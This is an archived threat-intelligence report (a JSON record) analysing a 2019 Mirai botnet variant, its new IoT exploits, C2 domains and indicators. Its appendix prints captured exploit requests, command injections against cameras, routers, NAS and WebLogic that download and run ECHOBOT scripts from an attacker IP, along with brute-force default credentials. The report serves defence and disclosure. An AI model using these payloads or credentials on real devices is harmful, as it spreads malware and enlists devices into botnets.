{
	"id": "8bceaff9-cb1f-4150-b7a6-41c037edc8b4",
	"created_at": "2026-04-06T00:13:05.70715Z",
	"updated_at": "2026-04-10T13:12:52.18894Z",
	"deleted_at": null,
	"sha1_hash": "c3e561edf834c9852ef28b08b205a04107848a78",
	"title": "New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 196240,
	"plain_text": "New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices\r\nBy Ruchna Nigam\r\nPublished: 2019-06-07 · Archived: 2026-04-05 15:03:46 UTC\r\nExecutive Summary\r\nPalo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016, when it took down several notable targets.\r\nAs part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless presentation systems to set-top boxes, SD-WANs, and even smart home controllers.\r\nMirai initially made use of default credentials to gain access to devices. However, since the end of 2017, samples of the family have increasingly been observed making use of publicly available exploits to propagate and run on vulnerable devices.\r\n2018 saw a continued increase in the emergence of campaigns involving variants incorporating several exploits within the same sample, allowing for the harvesting of several different kinds of IoT devices into the same botnet.\r\nSince then we have also observed Mirai malware authors experimenting with new exploits, found on the publicly available exploit-db, to gauge gains in bot count from the use of these exploits. This latest new variant we’ve observed and detailed in this post appears to be a continuation of the same trend.\r\nExploits\r\nThis latest variant contains a total of 18 exploits, 8 of which are new to Mirai. 
The vulnerabilities being exploited in the wild by this new Mirai variant for the first time are listed below, with more details in Table 1 in the Appendix:\r\nCVE-2019-3929\r\nOpenDreamBox Remote Code Execution\r\nCVE-2018-6961\r\nCVE-2018-7841\r\nCVE-2018-11510\r\nDell KACE Remote Code Execution\r\nCVE-2017-5174\r\nHooToo TripMate Remote Code Execution\r\nThe new samples also include four exploits which have only been used by Mirai in the past:\r\nLG Supersign TVs\r\nWePresent WiPG-1000 Wireless Presentation Systems\r\nBelkin WeMo devices\r\nMiCasaVerde VeraLite Smart Home Controllers\r\nThese new samples also include exploits targeting the Oracle WebLogic Servers RCE vulnerability, which has been used by both Linux and Windows botnets.\r\nAll of the exploits that have already been seen exploited by Mirai in the past are listed in Table 3 in the Appendix.\r\nAnalysis\r\nThe new variant we have discovered also has other distinguishing features beyond the use of the exploits mentioned above.\r\nThe encryption key used for the string table is 0xDFDAACFD, which is the equivalent of a byte-wise XOR with 0x54, based on the standard encryption scheme (as implemented in the toggle_obf function) used in the original Mirai source code.\r\nThere are several default credentials used for brute force that we have not come across previously in our research (though we cannot confirm this is their first use with Mirai). These are listed in Table 2 in the Appendix along with the devices that make use of them; of note, all of these credentials can be found online.\r\nInfrastructure\r\nThe samples were available at an open directory pictured in Figure 1:\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 1 of 11\n\nFigure 1. 
Open directory hosting Mirai variant\r\nSamples of this variant use two domains for C2, at different ports in the different versions, as explained below.\r\nThe latest version makes use of the two domains below for C2.\r\nakuma[.]pw:17\r\nakumaiotsolutions[.]pw:912\r\nWhile the two domains don't currently resolve to any IP, a search on Shodan for the IP address hosting the samples indicates that port 17 at that address was used for C2 at some point in time. This is seen in the response recorded from port 17 in the screenshot, which is the expected response from a Mirai C2 server based on how the C2 code is written in the original source code.\r\nFigure 2. Shodan search result indicating 31.13.195[.]251:17 was used for C2 at one point\r\nThe directory hosting the malware was updated a couple of times before the final version was uploaded at 26-May-2019 10:05 (server time). Each of the updates was minor: the attackers either edited C2 port numbers or slightly updated the payload.\r\nFile upload times:\r\n26-May-2019 10:05\r\n21-May-2019 16:34\r\n21-May-2019 08:38\r\n19-May-2019 06:05\r\nThe briefly available version from May 21, 2019 at 08:38 made use of the below two domains for C2. They are the same domains as used by the other samples (uploaded on prior or later dates) but the ports are different.\r\nakuma[.]pw:1822\r\nakumaiotsolutions[.]pw:721\r\nConclusion\r\nThis newly discovered variant is a continuation of efforts by Linux malware authors to scout for a wider range, and thus a larger number, of IoT devices to form larger botnets, thereby affording them greater firepower for DDoS attacks. Based on the results observed by using such variants, the exploits that are more effective, i.e. 
the ones that infect a greater number of devices, are retained or reused in future variants, whereas the less effective ones are retired or replaced by malware authors with other exploits.\r\nPalo Alto Networks customers are protected by:\r\nWildFire, which detects all related samples with malicious verdicts\r\nThreat Prevention and PAN-DB, which block all exploits and IPs/URLs used by this variant.\r\nAutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2019-3929\r\nOpenDreamBox_RCE\r\nCVE-2018-6961\r\nCVE-2018-7841\r\nCVE-2018-11510\r\nDellKACE_SysMgmtApp_RCE\r\nCVE-2017-5174\r\nHooTooTripMate_RCE\r\nBelkinWeMoRCE\r\nMiCasaVeraLiteRCE\r\nCVE-2018-17173\r\nWePresentCmdInjection\r\nASUS_DSLModem_RCE\r\nCVE-2019-2725\r\nNetgearReadyNAS_RCE\r\nCVE-2014-8361\r\nThe malware family can be tracked in AutoFocus using the tag Mirai.\r\nAppendix\r\nVulnerability | Affected Devices | Exploit Format\r\nVulnerability: CVE-2019-3929 | Affected Devices: Wireless Presentation Systems from several vendors\r\nExploit Format:\r\nPOST /cgi-bin/file_transfer.cgi HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nfile_transfer=new\u0026dir='Pa_Notecd wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*Pa_Note\r\nVulnerability: OpenDreamBox Remote Code Execution | Affected Devices: Devices running OpenDreamBox 2.0.0, an embedded Linux distribution for Set-Top-Boxes\r\nExploit Format:\r\nPOST /webadmin/script?command=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh 
ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nVulnerability: CVE-2018-6961 | Affected Devices: VMware NSX SD-WAN Edge \u003c 3.1.2\r\nExploit Format:\r\nPOST /scripts/ajaxPortal.lua HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://www.vmware.com\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nCookie: culture=en-us\r\nConnection: close\r\ndestination=8.8.8.8$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; c\r\n777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh\r\nECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg\r\nanonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*)\u0026source=192.168.0.1\u0026test=TRACEROUTE\u0026requestTimeout=900\u0026auth_token=\u0026_cmd=run_di\r\nname=google.com$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*)\u0026test=DNS_TEST\u0026requestTimeout=90\u0026auth_token=\u0026_cmd=run_diagnostic\r\ndestination=8.8.8.8$(cat /etc/shadow 
|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*)\u0026source=192.168.0.1\u0026test=BASIC_PING\u0026requestTimeout=90\u0026auth_token=\u0026_cmd=run_diagn\r\nVulnerability: CVE-2018-7841 | Affected Devices: Schneider Electric U.motion LifeSpace Management Systems\r\nExploit Format:\r\nPOST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1\r\nHost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\r\nAccept: /\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nCookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 86\r\nop=export\u0026language=english\u0026interval=1\u0026object_id=\\x60wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\\x60\r\nVulnerability: Dell KACE Remote Code Execution | Affected Devices: Dell KACE Systems Management Appliances\r\nExploit Format:\r\nPOST /service/krashrpt.php HTTP/1.1\r\nHost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept: /\r\nUser-Agent: Hello-World\r\nAccept-Language: 
en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 37\r\nkuid=\\x60id | wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh\r\nECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg\r\nanonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*\\x60\r\nVulnerability: CVE-2017-5174 | Affected Devices: Geutebrück IP Cameras\r\nExploit Format:\r\nPOST /uapi-cgi/viewer/testaction.cgi HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nip: eth0 1.1.1.1; wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmo\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh\r\nECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg\r\nanonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nVulnerability: HooToo TripMate Remote Code Execution | Affected Devices: HooToo TripMate Routers\r\nExploit Format:\r\nPOST /protocol.csp?function=set\u0026fname=security\u0026opt=mac_table\u0026flag=close_forever\u0026mac=|wget\r\nhttp://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh;\r\nECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r\r\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p\r\nanonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HT\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nAccept: 
/\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nVulnerability: CVE-2018-11510 | Affected Devices: Asustor NAS Devices\r\nTable 1. New exploits used in the Mirai variant\r\nDefault Credentials | Affected Device(s)\r\nblueangel/blueangel, root/abnareum10, root/Admin@tbroad, root/superuser | Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services\r\nadmin/wbox123 | WBOX IP Cameras, NVRs, DVRs\r\nadmin/pfsense | Netgate pfSense, an open source platform for traditional Firewall, VPN and Routing needs\r\nadmin/aerohive | Aerohive devices, a networking hardware vendor\r\nroot/awind5885 | Crestron AirMedia AM-100 Presentation Gateways\r\nhadoop/123456, hadoop/hadoop@123, hadoop/hadoopuser | Hadoop instances\r\nroot/ikwd | Toshiba IP Cameras\r\nTable 2. Unusual default credentials used in the Mirai variant\r\nVulnerability | Affected Devices | Exploit Format\r\nVulnerability: CVE-2019-2725 | Affected Devices: Oracle WebLogic Servers\r\nExploit Format:\r\nPOST /_async/AsyncResponseServiceHttps HTTP/1.1\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nUser-Agent: Hello-World\r\nConnection: close\r\nContent-Type: text/xml\nxx xmlns:work=http://bea.com/2004/06/soap/worka\nwget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777\n31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21\n\u00261\n-c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251\nECHOBOT1.sh; rm -rf ECHOBOT.*; \u003e/tmp/f ;\u0026targetUri=/tmp/thumb/test.jpg\u0026mediaType=image\u0026targetW\nContent-Length: 630\nAccept-Encoding: gzip, 
deflate\nUser-Agent: Hello-World\nHost: 192.168.0.1:9080\nConnection: keep-alive\nVulnerability: WePresent Command Injection | Affected Devices: WePresent WiPG-1000 Wireless Presentation systems\nExploit Format:\nPOST /cgi-bin/rdfs.cgi HTTP/1.1\nHost: 192.168.0.1:80\napplication/x-www-form-urlencoded\nContent-Length: 1024 Client=;wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECH\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous\nVulnerability: ASUS DSL Modem Remote Code Execution | Affected Devices: ASUS DSL-N12E_C1 1.1.2.3_345\nExploit Format:\nGET /Main_Analysis_Content.asp?\ncurrent_page=Main_Analysis_Content.asp\u0026next_page=Main_Analysis_Content.asp\u0026next_host=www.target.\ng987b580\u0026cmdMethod=ping\u0026destIP=wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]2\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous\nHost: 192.168.0.1:80\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nConnection: keep-alive\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko)\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nReferer: http://www.target.com/Main_Analysis_Content.asp\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nVulnerability: Belkin WeMo Remote Code Execution | Affected Devices: Belkin WeMo Devices\nExploit Format:\nPOST /upnp/control/basicevent1 HTTP/1.1\nHost: 20.36.21.25:49152\nConnection: keep-alive\nAccept-Encoding: gzip, deflate Accept: */*\nUser-Agent: python-requests/2.18.4\nSOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo\nContent-Length: 393\n\u003c?xml version=1.0 encoding=utf-8?\u003e \u003cs:Envelope xmlns:s=http://schemas.xmlsoap.org/soap/envelope/ s:enco\r\nhttp://31.13.195[.]251/ECHOBOT.x -O /tmp/ECHOBOT; chmod 777 /tmp/ECHOBOT; /tmp/ECHOBOT belk\r\nVulnerability: MiCasa 
VeraLite Remote Code Execution | Affected Devices: MiCasa VeraLite Smart Home Controllers\r\nExploit Format:\r\nPOST /upnp/control/hag HTTP/1.1\"\r\nHost: %s:49451\r\nAccept: text/javascript, text/html, application/xml, text/xml, */*\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nX-Prototype-Version: 1.7\r\nContent-Type: text/xml;charset=UTF-8\r\nMIME-Version: 1.0\r\nContent-Length: 311\r\nConnection: keep-alive\r\nPragma: no-cache\r\nSOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\r\n\u003cs:Envelope s:encodingStyle=\r\nhttp://schemas.xmlsoap.org/soap/encoding/ xmlns:s=http://schemas.xmlsoap.org/soap/envelope/\"\u003e\u003cs:Body\u003e \u003c\r\nhttp://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.s\r\n777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHO\r\nVulnerability: Netgear ReadyNas Remote Code Execution | Affected Devices: Netgear ReadyNas / NUUO NVRs\r\nExploit Format:\r\nPOST /upgrade_handle.php?cmd=writeuploaddir\u0026uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh E\r\nECHOBOT.*%205;%27 HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nGET /upgrade_handle.php?cmd=writeuploaddir\u0026uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh;\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh E\r\nHTTP/1.1\r\nHost: 192.168.0.1:50000\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: 
tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\r\nCookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en\r\nVulnerability: GoAhead Remote Code Execution | Affected Devices: IP cameras manufactured by GoAhead, Aldi, and several others\r\nExploit Format:\r\nGET /set_ftp.cgi?next_url=ftp.htm\u0026loginuse=%s\u0026loginpas=%s\u0026svr=192.168.1.1\u0026port=21\u0026user=ftp\u0026pwd=$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]25\r\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous\r\nVulnerability: CVE-2014-8361 | Affected Devices: Devices using the Realtek SDK with miniigd daemon\r\nExploit Format:\r\nPOST /wanipcn.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope//\" s:encodingStyle=\r\n\u003cNewRemoteHost\u003e\u003c/NewRemoteHost\u003e\u003cNewExternalPort\u003e47450\u003c/NewExternalPort\u003e\u003cNewProtocol\u003eTCP\u003c\r\nECHOBOT.mips; ./ECHOBOT.mips realtek\\x60\u003c/NewInternalClient\u003e\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\u003cNew\r\n\u003c/s:Envelope\u003e\r\nTable 3. 
Previously seen exploits used in the Mirai variant\r\nIndicators of Compromise\r\n26-May-2019 10:05 Samples\r\n21-May-2019 16:34 Samples\r\n21-May-2019 08:38 Samples\r\n19-May-2019 06:05 Samples\r\nOther Samples with unknown in-the-wild URLs\r\nC2\r\nakuma[.]pw\r\nakumaiotsolutions[.]pw\r\nMalware URLs/Payload Sources\r\nSource: https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/"
	],
	"report_names": [
		"new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices"
	],
	"threat_actors": [],
	"ts_created_at": 1775434385,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c3e561edf834c9852ef28b08b205a04107848a78.pdf",
		"text": "https://archive.orkl.eu/c3e561edf834c9852ef28b08b205a04107848a78.txt",
		"img": "https://archive.orkl.eu/c3e561edf834c9852ef28b08b205a04107848a78.jpg"
	}
}